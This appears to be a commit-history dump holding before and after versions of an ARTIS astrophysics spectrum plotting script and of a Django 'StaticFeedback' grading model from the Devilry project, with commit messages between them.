    specfilename = os.path.join(modelpath, 'spec.out')
    specdata = pd.read_csv(specfilename, delim_whitespace=True)
    timearray = specdata.columns.values[1:]
    arraynu = specdata.loc[:, '0'].values
    # Convert frequency (Hz) into wavelength (Angstroms).
    arraylambda_angstroms = const.c.to('angstrom/s').value / arraynu

    (modelname, timestepmin, timestepmax,
     time_days_lower, time_days_upper) = at.get_model_name_times(
         specfilename, timearray, args.timestep, args.timemin, args.timemax)

    absorptionfilename = os.path.join(modelpath, 'absorption.out')
    contribution_list, maxyvalueglobal, array_flambda_emission_total = at.spectra.get_flux_contributions(
        emissionfilename, absorptionfilename, maxion, timearray, arraynu,
        filterfunc, args.xmin, args.xmax, timestepmin, timestepmax)

    at.spectra.print_integrated_flux(array_flambda_emission_total, arraylambda_angstroms)

    # print("\n".join([f"{x[0]}, {x[1]}" for x in contribution_list]))

    # Keep only the args.maxseriescount strongest contributors; the rest
    # are merged by the sorting/reduction helper.
    contributions_sorted_reduced = at.spectra.sort_and_reduce_flux_contribution_list(
        contribution_list, args.maxseriescount, arraylambda_angstroms)

    plotobjects = axis.stackplot(
        arraylambda_angstroms, [x.array_flambda_emission for x in contributions_sorted_reduced], linewidth=0)

    # Reuse the emission stack's colors for the absorption stack so each
    # series matches above and below the axis.
    facecolors = [p.get_facecolor()[0] for p in plotobjects]
    axis.stackplot(
        arraylambda_angstroms, [-x.array_flambda_absorption for x in contributions_sorted_reduced],
        colors=facecolors, linewidth=0)

    plotobjectlabels = list([x.linelabel for x in contributions_sorted_reduced])

    plot_reference_spectra(axis, plotobjects, plotobjectlabels, args, flambdafilterfunc=None,
                           scale_to_peak=(maxyvalueglobal if args.normalised else None), linewidth=0.5)

    axis.axhline(color='white', linewidth=0.5)

    plotlabel = f't={time_days_lower:.2f}d to {time_days_upper:.2f}d\n{modelname}'
    axis.annotate(plotlabel, xy=(0.97, 0.03), xycoords='axes fraction',
                  horizontalalignment='right', verticalalignment='bottom', fontsize=9)

    # axis.set_ylim(ymin=-0.05 * maxyvalueglobal, ymax=maxyvalueglobal * 1.3)

    return plotobjects, plotobjectlabels
def make_plot(modelpaths, args):
    """
    Draw the figure (spectrum comparison, or emission/absorption when
    args.emissionabsorption is set) and save it to args.outputfile.
    """
    import matplotlib.ticker as ticker
    fig, axis = plt.subplots(1, 1, sharey=True, figsize=(8, 5), tight_layout={"pad": 0.2, "w_pad": 0.0, "h_pad": 0.0})
    axis.set_ylabel(r'F$_\lambda$ at 1 Mpc [erg/s/cm$^2$/$\AA$]')

    import scipy.signal

    def filterfunc(flambda):
        # Light Savitzky-Golay smoothing (window 5, polynomial order 3).
        return scipy.signal.savgol_filter(flambda, 5, 3)

    # filterfunc = None
    if args.emissionabsorption:
        plotobjects, plotobjectlabels = make_emission_plot(modelpaths[0], axis, filterfunc, args)
    else:
        make_spectrum_plot(modelpaths, axis, filterfunc, args)
        plotobjects, plotobjectlabels = axis.get_legend_handles_labels()

    axis.legend(plotobjects, plotobjectlabels, loc='best', handlelength=2,
                frameon=False, numpoints=1, prop={'size': args.legendfontsize})

    # plt.setp(plt.getp(axis, 'xticklabels'), fontsize=fsticklabel)
    # plt.setp(plt.getp(axis, 'yticklabels'), fontsize=fsticklabel)
    # for axis in ['top', 'bottom', 'left', 'right']:
    #     axis.spines[axis].set_linewidth(framewidth)
    axis.set_xlabel(r'Wavelength ($\AA$)')
    axis.set_xlim(xmin=args.xmin, xmax=args.xmax)
    axis.xaxis.set_major_locator(ticker.MultipleLocator(base=1000))
    axis.xaxis.set_minor_locator(ticker.MultipleLocator(base=100))

    filenameout = args.outputfile
    fig.savefig(filenameout, format='pdf')
    # plt.show()
    print(f'Saved {filenameout}')
    plt.close()
if __name__ == "__main__":
    # Entry point when run directly as a command-line script.
    main()
Don't use len() on sequence
#!/usr/bin/env python3
import argparse
import glob
import itertools
import os.path
import sys
import warnings
import artistools as at
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import pandas as pd
# import matplotlib.ticker as ticker
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
def main(argsraw=None):
    """
    Plot ARTIS spectra and (optionally) reference spectra.

    :param argsraw: optional argv-style list for argparse; None means
        parse sys.argv.
    """
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        description='Plot ARTIS model spectra by finding spec.out files '
                    'in the current directory or subdirectories.')
    parser.add_argument('modelpath', default=[], nargs='*',
                        help='Paths to ARTIS folders with spec.out or packets files'
                             ' (may include wildcards such as * and **)')
    parser.add_argument('--frompackets', default=False, action='store_true',
                        help='Read packets files directly instead of exspec results')
    parser.add_argument('--emissionabsorption', default=False, action='store_true',
                        help='Show an emission/absorption plot')
    parser.add_argument('-maxseriescount', type=int, default=9,
                        help='Maximum number of plot series (ions/processes) for emission/absorption plot')
    parser.add_argument('-listtimesteps', action='store_true', default=False,
                        help='Show the times at each timestep')
    parser.add_argument('-timestep', nargs='?',
                        help='First timestep or a range e.g. 45-65')
    parser.add_argument('-timemin', type=float,
                        help='Lower time in days to integrate spectrum')
    parser.add_argument('-timemax', type=float,
                        help='Upper time in days to integrate spectrum')
    parser.add_argument('-xmin', type=int, default=2500,
                        help='Plot range: minimum wavelength in Angstroms')
    parser.add_argument('-xmax', type=int, default=11000,
                        help='Plot range: maximum wavelength in Angstroms')
    parser.add_argument('--normalised', default=False, action='store_true',
                        help='Normalise the spectra to their peak values')
    parser.add_argument('-obsspec', action='append', dest='refspecfiles',
                        help='Also plot reference spectrum from this file')
    parser.add_argument('-legendfontsize', type=int, default=8,
                        help='Font size of legend text')
    parser.add_argument('-o', action='store', dest='outputfile',
                        help='path/filename for PDF file')
    args = parser.parse_args(argsraw)

    # Default to the current directory and its immediate subdirectories.
    if not args.modelpath:
        args.modelpath = ['.', '*']

    # combined the results of applying wildcards on each input
    modelpaths = list(itertools.chain.from_iterable([glob.glob(x) for x in args.modelpath if os.path.isdir(x)]))

    if args.listtimesteps:
        at.showtimesteptimes(modelpaths[0])
    else:
        if args.emissionabsorption:
            if len(modelpaths) > 1:
                print("ERROR: emission/absorption plot can only take one input model")
                # Fixed: exit with a nonzero status on error (bare sys.exit()
                # previously exited 0, signalling success to the shell).
                sys.exit(1)
            defaultoutputfile = "plotspecemission.pdf"
        else:
            defaultoutputfile = "plotspec.pdf"

        if not args.outputfile:
            args.outputfile = defaultoutputfile
        elif os.path.isdir(args.outputfile):
            args.outputfile = os.path.join(args.outputfile, defaultoutputfile)

        make_plot(modelpaths, args)
def plot_reference_spectra(axis, plotobjects, plotobjectlabels, args, flambdafilterfunc=None, scale_to_peak=None,
                           **plotkwargs):
    """
    Plot every reference spectrum listed in args.refspecfiles onto *axis*,
    appending the resulting legend patch and label to plotobjects and
    plotobjectlabels (both mutated in place).
    """
    if args.refspecfiles is None:
        return

    colorlist = ['black', '0.4']
    for specindex, specfilename in enumerate(args.refspecfiles):
        label = at.spectra.refspectralabels.get(specfilename, specfilename)
        # Give the first few reference spectra fixed colors; beyond that,
        # fall back to whatever color the caller supplied (if any).
        if specindex < len(colorlist):
            plotkwargs['color'] = colorlist[specindex]
        patch = plot_reference_spectrum(
            specfilename, label, axis, args.xmin, args.xmax, args.normalised,
            flambdafilterfunc, scale_to_peak, **plotkwargs)
        plotobjects.append(patch)
        plotobjectlabels.append(label)
def plot_reference_spectrum(filename, serieslabel, axis, xmin, xmax, normalised,
                            flambdafilterfunc=None, scale_to_peak=None, **plotkwargs):
    """
    Plot one reference spectrum file (columns: wavelength in Angstroms,
    F_lambda) from the refspectra directory next to this script.

    :return: a matplotlib Patch carrying the line's color, for the legend.
    """
    scriptdir = os.path.dirname(os.path.abspath(__file__))
    filepath = os.path.join(scriptdir, 'refspectra', filename)
    specdata = pd.read_csv(filepath, delim_whitespace=True, header=None,
                           names=['lambda_angstroms', 'f_lambda'], usecols=[0, 1])

    print(f"Reference spectrum '{serieslabel}' has {len(specdata)} points in the plot range")

    specdata.query('lambda_angstroms > @xmin and lambda_angstroms < @xmax', inplace=True)

    # Fixed: print_integrated_flux lives in at.spectra (as called elsewhere
    # in this module); the bare name raised NameError at runtime.
    at.spectra.print_integrated_flux(specdata.f_lambda, specdata.lambda_angstroms)

    if len(specdata) > 5000:
        # Thin out very dense spectra to keep the PDF small and plotting fast.
        # specdata = scipy.signal.resample(specdata, 10000)
        # specdata = specdata.iloc[::3, :].copy()
        specdata.query('index % 3 == 0', inplace=True)
        print(f"  downsamping to {len(specdata)} points")

    # clamp negative values to zero
    specdata['f_lambda'] = specdata['f_lambda'].apply(lambda x: max(0, x))

    if flambdafilterfunc:
        specdata['f_lambda'] = flambdafilterfunc(specdata['f_lambda'])

    if normalised:
        specdata['f_lambda_scaled'] = (specdata['f_lambda'] / specdata['f_lambda'].max() *
                                       (scale_to_peak if scale_to_peak else 1.0))
        ycolumnname = 'f_lambda_scaled'
    else:
        ycolumnname = 'f_lambda'

    if 'linewidth' not in plotkwargs and 'lw' not in plotkwargs:
        plotkwargs['linewidth'] = 1.5

    lineplot = specdata.plot(x='lambda_angstroms', y=ycolumnname, ax=axis, label=serieslabel, zorder=-1, **plotkwargs)
    return mpatches.Patch(color=lineplot.get_lines()[0].get_color())
def plot_artis_spectrum(axis, modelpath, args, from_packets=False, filterfunc=None, **plotkwargs):
    """
    Plot one ARTIS model spectrum (flux vs. wavelength) onto *axis*.

    Reads spec.out in *modelpath*, or the packets files directly when
    *from_packets* is True, restricted to the time range selected by
    args.timestep / args.timemin / args.timemax.
    """
    specfilename = os.path.join(modelpath, 'spec.out')
    # Resolve the requested timestep/time range into concrete timestep
    # indices and day values for this model.
    (modelname, timestepmin, timestepmax,
     time_days_lower, time_days_upper) = at.get_model_name_times(
         specfilename, at.get_timestep_times(specfilename),
         args.timestep, args.timemin, args.timemax)

    linelabel = f'{modelname} at t={time_days_lower:.2f}d to {time_days_upper:.2f}d'

    if from_packets:
        # find any other packets files in the same directory
        packetsfiles_thismodel = glob.glob(os.path.join(modelpath, 'packets**.out'))
        print(packetsfiles_thismodel)
        spectrum = at.spectra.get_spectrum_from_packets(
            packetsfiles_thismodel, time_days_lower, time_days_upper, lambda_min=args.xmin, lambda_max=args.xmax)
    else:
        spectrum = at.spectra.get_spectrum(specfilename, timestepmin, timestepmax, fnufilterfunc=filterfunc)

    # Restrict to the plotted wavelength window before integrating the flux.
    spectrum.query('@args.xmin < lambda_angstroms and lambda_angstroms < @args.xmax', inplace=True)

    at.spectra.print_integrated_flux(spectrum['f_lambda'], spectrum['lambda_angstroms'])

    # The scaled column is always computed but only plotted when
    # args.normalised is set.
    spectrum['f_lambda_scaled'] = spectrum['f_lambda'] / spectrum['f_lambda'].max()

    ycolumnname = 'f_lambda_scaled' if args.normalised else 'f_lambda'
    spectrum.plot(x='lambda_angstroms', y=ycolumnname, ax=axis,
                  label=linelabel, alpha=0.95, **plotkwargs)
def make_spectrum_plot(modelpaths, axis, filterfunc, args):
    """
    Plot any observational reference spectra plus one ARTIS spectrum per
    model path onto *axis*.
    """
    plot_reference_spectra(axis, [], [], args, flambdafilterfunc=filterfunc)

    for seriesindex, folderpath in enumerate(modelpaths):
        modelname = at.get_model_name(folderpath)
        print(f"====> {modelname}")

        # Alternate solid/dashed every seven series, and thin the line a
        # little for each successive model so overlaps stay readable.
        # plotkwargs['dashes'] = dashesList[index]
        # plotkwargs['dash_capstyle'] = dash_capstyleList[index]
        serieskwargs = {
            'linestyle': '--' if (int(seriesindex / 7) % 2) else '-',
            'linewidth': 2.5 - (0.2 * seriesindex),
        }

        plot_artis_spectrum(axis, folderpath, args=args, from_packets=args.frompackets,
                            filterfunc=filterfunc, **serieskwargs)

    if args.normalised:
        axis.set_ylim(ymin=-0.1, ymax=1.25)
        axis.set_ylabel(r'Scaled F$_\lambda$')
def make_emission_plot(modelpath, axis, filterfunc, args):
    """
    Plot stacked per-ion/per-process emission contributions (positive y)
    and absorption contributions (mirrored below the x axis) for one
    ARTIS model.

    :return: (plotobjects, plotobjectlabels) for building the legend.
    """
    from astropy import constants as const
    maxion = 5  # must match sn3d.h value
    # Prefer emissiontrue.out when present; fall back to emission.out.
    emissionfilename = os.path.join(modelpath, 'emissiontrue.out')
    if not os.path.exists(emissionfilename):
        emissionfilename = os.path.join(modelpath, 'emission.out')
    specfilename = os.path.join(modelpath, 'spec.out')
    specdata = pd.read_csv(specfilename, delim_whitespace=True)
    timearray = specdata.columns.values[1:]
    arraynu = specdata.loc[:, '0'].values
    # Convert frequency (Hz) into wavelength (Angstroms).
    arraylambda_angstroms = const.c.to('angstrom/s').value / arraynu

    (modelname, timestepmin, timestepmax,
     time_days_lower, time_days_upper) = at.get_model_name_times(
         specfilename, timearray, args.timestep, args.timemin, args.timemax)

    absorptionfilename = os.path.join(modelpath, 'absorption.out')
    contribution_list, maxyvalueglobal, array_flambda_emission_total = at.spectra.get_flux_contributions(
        emissionfilename, absorptionfilename, maxion, timearray, arraynu,
        filterfunc, args.xmin, args.xmax, timestepmin, timestepmax)

    at.spectra.print_integrated_flux(array_flambda_emission_total, arraylambda_angstroms)

    # print("\n".join([f"{x[0]}, {x[1]}" for x in contribution_list]))

    # Keep only the args.maxseriescount strongest contributors; the rest
    # are merged by the sorting/reduction helper.
    contributions_sorted_reduced = at.spectra.sort_and_reduce_flux_contribution_list(
        contribution_list, args.maxseriescount, arraylambda_angstroms)

    plotobjects = axis.stackplot(
        arraylambda_angstroms, [x.array_flambda_emission for x in contributions_sorted_reduced], linewidth=0)

    # Reuse the emission stack's colors for the absorption stack so each
    # series matches above and below the axis.
    facecolors = [p.get_facecolor()[0] for p in plotobjects]
    axis.stackplot(
        arraylambda_angstroms, [-x.array_flambda_absorption for x in contributions_sorted_reduced],
        colors=facecolors, linewidth=0)

    plotobjectlabels = list([x.linelabel for x in contributions_sorted_reduced])

    plot_reference_spectra(axis, plotobjects, plotobjectlabels, args, flambdafilterfunc=None,
                           scale_to_peak=(maxyvalueglobal if args.normalised else None), linewidth=0.5)

    axis.axhline(color='white', linewidth=0.5)

    plotlabel = f't={time_days_lower:.2f}d to {time_days_upper:.2f}d\n{modelname}'
    axis.annotate(plotlabel, xy=(0.97, 0.03), xycoords='axes fraction',
                  horizontalalignment='right', verticalalignment='bottom', fontsize=9)

    # axis.set_ylim(ymin=-0.05 * maxyvalueglobal, ymax=maxyvalueglobal * 1.3)

    return plotobjects, plotobjectlabels
def make_plot(modelpaths, args):
    """
    Draw the figure (spectrum comparison, or emission/absorption when
    args.emissionabsorption is set) and save it to args.outputfile.
    """
    import matplotlib.ticker as ticker
    fig, axis = plt.subplots(1, 1, sharey=True, figsize=(8, 5), tight_layout={"pad": 0.2, "w_pad": 0.0, "h_pad": 0.0})
    axis.set_ylabel(r'F$_\lambda$ at 1 Mpc [erg/s/cm$^2$/$\AA$]')

    import scipy.signal

    def filterfunc(flambda):
        # Light Savitzky-Golay smoothing (window 5, polynomial order 3).
        return scipy.signal.savgol_filter(flambda, 5, 3)

    # filterfunc = None
    if args.emissionabsorption:
        plotobjects, plotobjectlabels = make_emission_plot(modelpaths[0], axis, filterfunc, args)
    else:
        make_spectrum_plot(modelpaths, axis, filterfunc, args)
        plotobjects, plotobjectlabels = axis.get_legend_handles_labels()

    axis.legend(plotobjects, plotobjectlabels, loc='best', handlelength=2,
                frameon=False, numpoints=1, prop={'size': args.legendfontsize})

    # plt.setp(plt.getp(axis, 'xticklabels'), fontsize=fsticklabel)
    # plt.setp(plt.getp(axis, 'yticklabels'), fontsize=fsticklabel)
    # for axis in ['top', 'bottom', 'left', 'right']:
    #     axis.spines[axis].set_linewidth(framewidth)
    axis.set_xlabel(r'Wavelength ($\AA$)')
    axis.set_xlim(xmin=args.xmin, xmax=args.xmax)
    axis.xaxis.set_major_locator(ticker.MultipleLocator(base=1000))
    axis.xaxis.set_minor_locator(ticker.MultipleLocator(base=100))

    filenameout = args.outputfile
    fig.savefig(filenameout, format='pdf')
    # plt.show()
    print(f'Saved {filenameout}')
    plt.close()
if __name__ == "__main__":
    # Entry point when run directly as a command-line script.
    main()
|
from datetime import datetime
from django.utils.translation import ugettext as _
from django.db import models
from django.db.models import Q
from django.contrib.auth.models import User
from abstract_is_admin import AbstractIsAdmin
from abstract_is_examiner import AbstractIsExaminer
from abstract_is_candidate import AbstractIsCandidate
from delivery import Delivery
from node import Node
class StaticFeedback(models.Model, AbstractIsAdmin, AbstractIsExaminer, AbstractIsCandidate):
""" Represents a feedback for a `Delivery`_.
Each delivery can have zero or more feedbacks. Each StaticFeedback object stores
static data that an examiner has published on a delivery. StaticFeedback is
created and edited in a *grade+feedback editor* in a *grade plugin*, and
when an examiner choose to publish feedback, a static copy of the data
he/she created in the *grade+feedback editor* is stored in a StaticFeedback.
Feedbacks are only visible to students when
:attr:`Deadline.feedbacks_published` on the related deadline is ``True``.
Feedbacks are related to Deadlines through its :attr:`delivery`.
Students are presented with the last feedback on a delivery, however they
can browse every StaticFeedback on their deliveries. This history is to protect
the student from administrators or examiners that change published
feedback to avoid that a student can make an issue out of a bad feedback.
**NOTE:** When a StaticFeedback is saved, the corresponding
:attr:`AssignmentGroup.feedback` is updated to the newly created
StaticFeedback.
.. attribute:: rendered_view
The rendered HTML view.
.. attribute:: saved_by
The django.contrib.auth.models.User_ that created the StaticFeedback.
.. attribute:: save_timestamp
Date/time when this feedback was created.
.. attribute:: delivery
A django.db.models.ForeignKey_ that points to the `Delivery`_ where this feedback belongs.
.. attribute:: grade
The grade as a short string (max 12 chars).
.. attribute:: points
The number of points (integer).
.. attribute:: is_passing_grade
Boolean is passing grade?
"""
delivery = models.ForeignKey(Delivery, related_name='feedbacks')
rendered_view = models.TextField(blank=True,
help_text=('A rendered HTML version of the feedback, containing '
'whatever the grade-editor chose to dump in this field.'))
grade = models.CharField(max_length=12, help_text='The rendered grade, such as "A" or "approved".')
points = models.PositiveIntegerField(help_text='Number of points given on this feedback.')
is_passing_grade = models.BooleanField(help_text='Is this a passing grade?')
save_timestamp = models.DateTimeField(blank=True, null=True,
help_text=('Time when this feedback was saved. Since StaticFeedback '
'is immutable, this never changes.'))
saved_by = models.ForeignKey(User, blank=False, null=False,
help_text='The user (examiner) who saved this feedback')
class Meta:
app_label = 'core'
verbose_name = 'Static feedback'
verbose_name_plural = 'Static feedbacks'
ordering = ['-save_timestamp']
@classmethod
def q_is_admin(cls, user_obj):
return Q(delivery__deadline__assignment_group__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__parentnode__parentnode__pk__in=Node._get_nodepks_where_isadmin(user_obj))
@classmethod
def q_is_candidate(cls, user_obj):
"""
Returns a django.models.Q object matching Deliveries where
the given student is candidate.
"""
return Q(delivery__deadline__assignment_group__candidates__student=user_obj)
@classmethod
def q_published(cls, old=True, active=True):
now = datetime.now()
q = Q(delivery__deadline__assignment_group__parentnode__publishing_time__lt = now)
if not active:
q &= ~Q(delivery__deadline__assignment_group__parentnode__parentnode__end_time__gte = now)
if not old:
q &= ~Q(delivery__deadline__assignment_group__parentnode__parentnode__end_time__lt = now)
return q
@classmethod
def q_is_examiner(cls, user_obj):
"""
Returns a django.models.Q object matching Feedbacks where
the given student is candidate.
"""
return Q(delivery__deadline__assignment_group__examiners__user=user_obj)
@classmethod
def from_points(cls, assignment, points, **kwargs):
"""
Shortcut method to initialize the StaticFeedback object
from points. We take the assignment as argument instead
of looking it up via ``self.delivery.deadline.assignment_group``
because we want to to be efficient when creating feedback in bulk.
Initializes a StaticFeedback with the given points, with grade
and is_passing_grade inferred from the points with the help
of :meth:`devilry.apps.core.models.Assignment.points_to_grade`
and :meth:`devilry.apps.core.models.Assignment.points_is_passing_grade`.
Example::
feedback = StaticFeedback.from_points(
assignment=myassignment,
points=10,
delivery=mydelivery,
saved_by=someuser)
assert(feedback.id == None)
assert(feedback.grade != None)
:param assignment:
An Assignment object. Should be the assignment where delivery
this feedback is for belongs, but that is not checked.
:param points:
The number of points for the feedback.
:param kwargs:
Extra kwargs for the StaticFeedback constructor.
:return: An (unsaved) StaticFeedback.
"""
is_passing_grade = assignment.points_is_passing_grade(points)
grade = assignment.points_to_grade(points)
return cls(
points=points,
is_passing_grade=is_passing_grade,
grade=grade, **kwargs
)
def _publish_if_allowed(self):
assignment = self.delivery.deadline.assignment_group.parentnode
if assignment.examiners_publish_feedbacks_directly:
deadline = self.delivery.deadline
deadline.feedbacks_published = True
deadline.save()
def _close_group(self):
self.delivery.deadline.assignment_group.is_open = False
self.delivery.deadline.assignment_group.save()
def save(self, *args, **kwargs):
    """
    :param autoset_timestamp_to_now:
        Automatically set the ``timestamp``-attribute of this model
        to *now*? Defaults to ``True``.
    :param autoupdate_related_models:
        Automatically update related models:
        - Sets the ``last_feedback``-attribute of ``self.delivery`` and saves the delivery.
        - Sets the ``feedback`` and ``is_open`` attributes of
          ``self.delivery.deadline.assignment_group`` to this feedback, and ``False``.
          Saves the AssignmentGroup.
        Defaults to ``True``.
    """
    # Pop our custom flags before delegating to Django's save().
    autoupdate_related_models = kwargs.pop('autoupdate_related_models', True)
    autoset_timestamp_to_now = kwargs.pop('autoset_timestamp_to_now', True)
    if autoset_timestamp_to_now:
        self.save_timestamp = datetime.now()
    super(StaticFeedback, self).save(*args, **kwargs)
    if autoupdate_related_models:
        delivery = self.delivery
        self.delivery.last_feedback = self
        # Skip the delivery's own auto-set logic -- we only update
        # last_feedback here.
        self.delivery.save(
            autoset_time_of_delivery=False,
            autoset_number=False)
        group = delivery.deadline.assignment_group
        group.feedback = self
        # Publishing a feedback closes the group.
        group.is_open = False
        group.save()
    self._publish_if_allowed()
def __unicode__(self):
    # Human-readable label used by Django's admin/shell (Python 2).
    return "StaticFeedback on %s" % self.delivery
def copy(self, newdelivery):
    """
    Copy this StaticFeedback into ``newdelivery``.
    .. note::
        This only copies the StaticFeedback, not any data related to it
        via any grade editors.
    .. warning::
        This does not autoset the feedback as active on the group or as latest on the delivery.
        You need to handle that yourself after the copy.
    """
    feedbackcopy = StaticFeedback(delivery=newdelivery,
                                  rendered_view=self.rendered_view,
                                  grade=self.grade,
                                  points=self.points,
                                  is_passing_grade=self.is_passing_grade,
                                  save_timestamp=self.save_timestamp,
                                  saved_by=self.saved_by)
    feedbackcopy.full_clean()
    # Plain copy: keep the original timestamp and do not touch
    # group.feedback / delivery.last_feedback (see the warning above).
    feedbackcopy.save(autoupdate_related_models=False,
                      autoset_timestamp_to_now=False)
    return feedbackcopy
apps.core.models.static_feedback: Make specifying assignment optional for from_points().
from datetime import datetime
from django.utils.translation import ugettext as _
from django.db import models
from django.db.models import Q
from django.contrib.auth.models import User
from abstract_is_admin import AbstractIsAdmin
from abstract_is_examiner import AbstractIsExaminer
from abstract_is_candidate import AbstractIsCandidate
from delivery import Delivery
from node import Node
class StaticFeedback(models.Model, AbstractIsAdmin, AbstractIsExaminer, AbstractIsCandidate):
    """ Represents a feedback for a `Delivery`_.
    Each delivery can have zero or more feedbacks. Each StaticFeedback object stores
    static data that an examiner has published on a delivery. StaticFeedback is
    created and edited in a *grade+feedback editor* in a *grade plugin*, and
    when an examiner choose to publish feedback, a static copy of the data
    he/she created in the *grade+feedback editor* is stored in a StaticFeedback.
    Feedbacks are only visible to students when
    :attr:`Deadline.feedbacks_published` on the related deadline is ``True``.
    Feedbacks are related to Deadlines through its :attr:`delivery`.
    Students are presented with the last feedback on a delivery, however they
    can browse every StaticFeedback on their deliveries. This history is to protect
    the student from administrators or examiners that change published
    feedback to avoid that a student can make an issue out of a bad feedback.
    **NOTE:** When a StaticFeedback is saved, the corresponding
    :attr:`AssignmentGroup.feedback` is updated to the newly created
    StaticFeedback.
    .. attribute:: rendered_view
        The rendered HTML view.
    .. attribute:: saved_by
        The django.contrib.auth.models.User_ that created the StaticFeedback.
    .. attribute:: save_timestamp
        Date/time when this feedback was created.
    .. attribute:: delivery
        A django.db.models.ForeignKey_ that points to the `Delivery`_ where this feedback belongs.
    .. attribute:: grade
        The grade as a short string (max 12 chars).
    .. attribute:: points
        The number of points (integer).
    .. attribute:: is_passing_grade
        Boolean is passing grade?
    """
    delivery = models.ForeignKey(Delivery, related_name='feedbacks')
    rendered_view = models.TextField(blank=True,
                                     help_text=('A rendered HTML version of the feedback, containing '
                                                'whatever the grade-editor chose to dump in this field.'))
    grade = models.CharField(max_length=12, help_text='The rendered grade, such as "A" or "approved".')
    points = models.PositiveIntegerField(help_text='Number of points given on this feedback.')
    is_passing_grade = models.BooleanField(help_text='Is this a passing grade?')
    save_timestamp = models.DateTimeField(blank=True, null=True,
                                          help_text=('Time when this feedback was saved. Since StaticFeedback '
                                                     'is immutable, this never changes.'))
    saved_by = models.ForeignKey(User, blank=False, null=False,
                                 help_text='The user (examiner) who saved this feedback')

    class Meta:
        app_label = 'core'
        verbose_name = 'Static feedback'
        verbose_name_plural = 'Static feedbacks'
        # Newest feedback first.
        ordering = ['-save_timestamp']

    @classmethod
    def q_is_admin(cls, user_obj):
        # Admin on the assignment, period, subject, or any node above it.
        return Q(delivery__deadline__assignment_group__parentnode__admins=user_obj) | \
            Q(delivery__deadline__assignment_group__parentnode__parentnode__admins=user_obj) | \
            Q(delivery__deadline__assignment_group__parentnode__parentnode__parentnode__admins=user_obj) | \
            Q(delivery__deadline__assignment_group__parentnode__parentnode__parentnode__parentnode__pk__in=Node._get_nodepks_where_isadmin(user_obj))

    @classmethod
    def q_is_candidate(cls, user_obj):
        """
        Returns a django.models.Q object matching Deliveries where
        the given student is candidate.
        """
        return Q(delivery__deadline__assignment_group__candidates__student=user_obj)

    @classmethod
    def q_published(cls, old=True, active=True):
        # Published assignments only; optionally exclude active
        # (period not yet ended) or old (period already ended) ones.
        now = datetime.now()
        q = Q(delivery__deadline__assignment_group__parentnode__publishing_time__lt = now)
        if not active:
            q &= ~Q(delivery__deadline__assignment_group__parentnode__parentnode__end_time__gte = now)
        if not old:
            q &= ~Q(delivery__deadline__assignment_group__parentnode__parentnode__end_time__lt = now)
        return q

    @classmethod
    def q_is_examiner(cls, user_obj):
        """
        Returns a django.models.Q object matching StaticFeedbacks where
        the given user is examiner.
        """
        return Q(delivery__deadline__assignment_group__examiners__user=user_obj)

    @classmethod
    def from_points(cls, points, assignment=None, **kwargs):
        """
        Shortcut method to initialize the StaticFeedback object
        from points.
        Initializes a StaticFeedback with the given points, with grade
        and is_passing_grade inferred from the points with the help
        of :meth:`devilry.apps.core.models.Assignment.points_to_grade`
        and :meth:`devilry.apps.core.models.Assignment.points_is_passing_grade`.
        Example::
            feedback = StaticFeedback.from_points(
                assignment=myassignment,
                points=10,
                delivery=mydelivery,
                saved_by=someuser)
            assert(feedback.id == None)
            assert(feedback.grade != None)
        :param points:
            The number of points for the feedback.
        :param assignment:
            An Assignment object. Should be the assignment where the delivery
            this feedback is for belongs, but that is not checked.
            Defaults to ``self.delivery.deadline.assignment_group.assignment``.
            We provide the ability to take the assignment as argument instead
            of looking it up via ``self.delivery.deadline.assignment_group``
            because we want it to be efficient when creating feedback in bulk.
        :param kwargs:
            Extra kwargs for the StaticFeedback constructor.
        :return: An (unsaved) StaticFeedback.
        """
        if not assignment:
            # NOTE(review): this fallback requires ``delivery`` in kwargs
            # (KeyError otherwise) and assumes Delivery exposes an
            # ``assignment`` shortcut; the docstring describes the longer
            # deadline.assignment_group path -- confirm they agree.
            assignment = kwargs['delivery'].assignment
        is_passing_grade = assignment.points_is_passing_grade(points)
        grade = assignment.points_to_grade(points)
        return cls(
            points=points,
            is_passing_grade=is_passing_grade,
            grade=grade, **kwargs
        )

    def _publish_if_allowed(self):
        # If the assignment lets examiners publish directly, flip the
        # publish flag on the deadline so students see this feedback.
        assignment = self.delivery.deadline.assignment_group.parentnode
        if assignment.examiners_publish_feedbacks_directly:
            deadline = self.delivery.deadline
            deadline.feedbacks_published = True
            deadline.save()

    def _close_group(self):
        # Close the assignment group owning this feedback's delivery.
        self.delivery.deadline.assignment_group.is_open = False
        self.delivery.deadline.assignment_group.save()

    def save(self, *args, **kwargs):
        """
        :param autoset_timestamp_to_now:
            Automatically set the ``timestamp``-attribute of this model
            to *now*? Defaults to ``True``.
        :param autoupdate_related_models:
            Automatically update related models:
            - Sets the ``last_feedback``-attribute of ``self.delivery`` and saves the delivery.
            - Sets the ``feedback`` and ``is_open`` attributes of
              ``self.delivery.deadline.assignment_group`` to this feedback, and ``False``.
              Saves the AssignmentGroup.
            Defaults to ``True``.
        """
        # Pop our custom flags before delegating to Django's save().
        autoupdate_related_models = kwargs.pop('autoupdate_related_models', True)
        autoset_timestamp_to_now = kwargs.pop('autoset_timestamp_to_now', True)
        if autoset_timestamp_to_now:
            self.save_timestamp = datetime.now()
        super(StaticFeedback, self).save(*args, **kwargs)
        if autoupdate_related_models:
            delivery = self.delivery
            self.delivery.last_feedback = self
            # Skip the delivery's own auto-set logic -- we only update
            # last_feedback here.
            self.delivery.save(
                autoset_time_of_delivery=False,
                autoset_number=False)
            group = delivery.deadline.assignment_group
            group.feedback = self
            # Publishing a feedback closes the group.
            group.is_open = False
            group.save()
        self._publish_if_allowed()

    def __unicode__(self):
        # Human-readable label used by Django's admin/shell (Python 2).
        return "StaticFeedback on %s" % self.delivery

    def copy(self, newdelivery):
        """
        Copy this StaticFeedback into ``newdelivery``.
        .. note::
            This only copies the StaticFeedback, not any data related to it
            via any grade editors.
        .. warning::
            This does not autoset the feedback as active on the group or as latest on the delivery.
            You need to handle that yourself after the copy.
        """
        feedbackcopy = StaticFeedback(delivery=newdelivery,
                                      rendered_view=self.rendered_view,
                                      grade=self.grade,
                                      points=self.points,
